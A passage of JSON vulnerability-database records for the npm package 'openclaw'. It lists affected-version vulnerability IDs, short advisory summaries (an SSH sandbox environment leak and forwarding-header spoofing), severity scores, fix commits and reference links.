                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35659",
                "GHSA-rvqr-hrcc-j9vv"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s4s8-8qea-q3fd"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89991?format=api",
            "vulnerability_id": "VCID-sja9-6t41-hud8",
            "summary": "OpenClaw: SSH-based sandbox backends pass unsanitized process.env to child processes\n## Summary\nSSH-based sandbox backends pass unsanitized process.env to child processes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped SSH sandbox paths leaked the unsanitized environment into local SSH child processes, but remote leakage requires non-default SSH env forwarding, so the severity is lowered to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `cfe14459531e002a1c61c27d97ec7dc8aecddc1f` — 2026-03-30T20:05:57+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-j9pv-rrcj-6pfx",
                    "reference_id": "GHSA-j9pv-rrcj-6pfx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-j9pv-rrcj-6pfx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-j9pv-rrcj-6pfx"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sja9-6t41-hud8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91179?format=api",
            "vulnerability_id": "VCID-sw3m-5ryw-jbdh",
            "summary": "OpenClaw: Forwarding header spoofing bypasses gateway.trustedProxies origin detection\n## Summary\nWhen gateway.trustedProxies was configured, spoofed loopback hops in forwarding headers could be accepted as the client origin and weaken downstream auth and rate-limit decisions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/net.ts now ignores loopback forwarded hops before trusted-proxy client resolution.\n- That shipped origin fix is the one consumed by canvas auth and gateway auth-rate-limit paths that rely on resolved client identity.\n\nOpenClaw thanks @lintsinghua for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35656",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00224",
                            "scoring_system": "epss",
                            "scoring_elements": "0.45223",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00224",
                            "scoring_system": "epss",
                            "scoring_elements": "0.45206",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00224",
                            "scoring_system": "epss",
                            "scoring_elements": "0.45226",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35656"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
